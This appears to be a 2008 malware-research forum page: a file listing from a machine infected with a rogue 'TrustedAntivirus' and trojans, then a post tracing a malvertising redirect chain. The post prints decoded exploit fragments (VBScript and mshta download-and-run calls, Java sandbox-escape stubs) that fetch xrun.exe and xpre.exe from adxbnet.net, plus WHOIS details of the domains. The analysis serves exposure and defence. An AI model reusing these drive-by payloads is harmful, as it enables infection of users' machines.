c:\Program Files\TrustedAntivirus\Graphics\kb.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\main.ico
Date: 11/24/2006 7:00 PM
Size: 3,774 bytes
c:\Program Files\TrustedAntivirus\Graphics\mini.ico
Date: 11/24/2006 6:11 PM
Size: 28,646 bytes
c:\Program Files\TrustedAntivirus\Graphics\Online.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\rm.url
Date: 3/6/2008 11:02 PM
Size: 62 bytes
c:\Program Files\TrustedAntivirus\Graphics\support.ico
Date: 12/16/2005 11:02 AM
Size: 25,214 bytes
c:\Program Files\TrustedAntivirus\Graphics\Support.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\uninstall.ico
Date: 10/6/2005 12:09 PM
Size: 1,406 bytes
c:\Program Files\TrustedAntivirus\LA\lapv.dat
Date: 3/6/2008 11:02 PM
Size: 3 bytes
c:\Program Files\TrustedAntivirus\LA\License.rtf
Date: 3/6/2008 11:01 PM
Size: 10,817 bytes
c:\Program Files\TrustedAntivirus\Tools\pblock.dll
Date: 11/27/2007 5:30 PM
Size: 222,208 bytes
c:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
Date: 11/27/2007 5:31 PM
Size: 1,102,848 bytes
c:\Program Files\TrustedAntivirus\Up\ASupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\gup.exe
Date: 11/7/2007 6:17 PM
Size: 716,800 bytes
c:\Program Files\TrustedAntivirus\Up\PGupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\UBupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\up.dat
Date: 3/6/2008 11:02 PM
Size: 41 bytes
c:\Program Files\TrustedAntivirus\Up\updater.dat
Date: 3/6/2008 11:02 PM
Size: 259 bytes
c:\Temp\txNog4220.exe
Date: 3/6/2008 10:40 PM
Size: 212,118 bytes
c:\Temp\1cb\syscheck.log
Date: 1/9/2008 6:44 AM
Size: 28,747 bytes
c:\Temp\sanR24\lDii.log
Date: 3/6/2008 10:41 PM
Size: 1,858 bytes
c:\WINDOWS\17PHolmes572.exe
Date: 3/6/2008 10:46 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu1000106.exe
Date: 3/6/2008 10:47 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu572.exe.tmp
Date: 3/6/2008 10:41 PM
Size: 37,376 bytes
c:\WINDOWS\uninstall_nmon.vbs
Date: 1/3/2006 5:45 PM
Size: 1,989 bytes
c:\WINDOWS\Downloaded Program Files\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\WINDOWS\S0xZ\asappsrv.dll
Date: 8/2/2005 4:46 PM
Size: 187,904 bytes
c:\WINDOWS\S0xZ\command.exe
Date: 8/2/2005 4:58 PM
Size: 293,888 bytes
c:\WINDOWS\S0xZ\mXUt.vbs
Date: 7/29/2005 4:24 PM
Size: 472 bytes
c:\WINDOWS\system32\atmtd.dll
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\atmtd.dll._
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\ddcdbxu.dll
Date: 3/6/2008 10:49 PM
Size: 36,352 bytes
c:\WINDOWS\system32\fccbbya.dll
Date: 3/6/2008 10:39 PM
Size: 36,352 bytes
c:\WINDOWS\system32\jkkihgg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\khfcb.dll
Date: 3/6/2008 10:44 PM
Size: 332,800 bytes
c:\WINDOWS\system32\MSINET.DEP
Date: 6/18/1998 5:00 AM
Size: 2,407 bytes
c:\WINDOWS\system32\MSINET.oca
Date: 4/26/2007 6:30 AM
Size: 29,184 bytes
c:\WINDOWS\system32\MSINET.OCX
Date: 6/24/1998 5:00 AM
Size: 115,016 bytes
c:\WINDOWS\system32\msnav32.ax
Date: 3/6/2008 10:47 PM
Size: 32 bytes
c:\WINDOWS\system32\pac.txt
Date: 9/24/2007 2:05 AM
Size: 279,600 bytes
c:\WINDOWS\system32\qomjgfg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\tuvvtrp.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\urqommk.dll
Date: 3/6/2008 10:48 PM
Size: 36,352 bytes
c:\WINDOWS\system32\ax9\np89104.exe
Date: 2/7/2008 11:07 PM
Size: 136,111 bytes
c:\WINDOWS\system32\bv2\renabcom4.exe
Date: 2/14/2008 4:42 PM
Size: 49,152 bytes
c:\WINDOWS\system32\drivers\dhlp.sys
Date: 3/6/2008 11:02 PM
Size: 46,592 bytes
c:\WINDOWS\system32\ev4\philcom3.exe
Date: 8/14/2007 11:22 PM
Size: 25,105 bytes
c:\WINDOWS\system32\iDlo01\iDlo011065.exe
Date: 2/24/2008 8:45 AM
Size: 32,768 bytes
c:\WINDOWS\Temp\cc12.tmp
Date: 3/6/2008 11:07 PM
Size: 0 bytes

Adverts ? No thanks !
Kimberly
Jun 10 2008, 06:13 PM

New domains - placeholders


The redirect is coming through the combo www.axill.com & ad2.adecn.com also.

Placeholder.

www.awltovhc.net

CODE
GET http://www.awltovhc.net/placeholder-1701629-86358216?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.awltovhc.net
Proxy-Connection: Keep-Alive
______________________________

Iframes.

The 3 links still contain obfuscated scripts & exploits, slightly different as above but with the same results. They can be safely viewed using a sniffer. I will only post decoded parts.

CODE
GET http://adxbnet.net/code/smain.php?scout=acxcrds HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=acxcobj HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
if(b) { try { b.run("mshta http://adxbnet.net/code/srun.php", 0); }catch(e){} }
...
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=jvcxeng HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }
______________________________

Banner.

85.17.162.100/banner/mp3downloads.jpg
IPB Image
______________________________

adxbnet.net - 83.216.217.242

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-05-26
Expires: 2009-05-26
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 83.216.217.242
IP Location - Niederosterreich - Baden - Colobase Customer Allocation
Reverse IP: 20 other sites hosted on this server.

Domain Name: ADXBNET.NET

Registrant [1398527]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxbnet.net
  7. Adxrnet.net
  8. Awofkwy.net
  9. Especialads.com
  10. Iefjios.net
  11. Kasdfps.net
  12. Kiafjwo.net
  13. Netaddirect.com
  14. Netcrefer.net
  15. Netcshow.net
  16. Netsdir.net
  17. Snipenet.net
  18. Snipernet.biz
  19. Snipernet.us
  20. Sxload.net
  21. Xpseek.net
Iefjios.net is currently being used as a placeholder also.
______________________________

ad.adrefer.net - 85.17.162.100

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2007-05-02
Expires: 2009-05-02
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.0.52 (CentOS)
IP Address: 85.17.162.100
IP Location - Noord-holland - Amsterdam - Leaseweb
Reverse IP: 4 other sites hosted on this server

Domain Name: ADREFER.NET

Registrant [693328]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adrefer.net
  2. Awltovhc.net
  3. Ikwlkad.net
  4. Iwdjiamk.net
  5. Tqlkg.net
______________________________

adecn.com (Microsoft) has been notified.


Note: Thanks for the PM about adxbnet.net and ikwlkad.net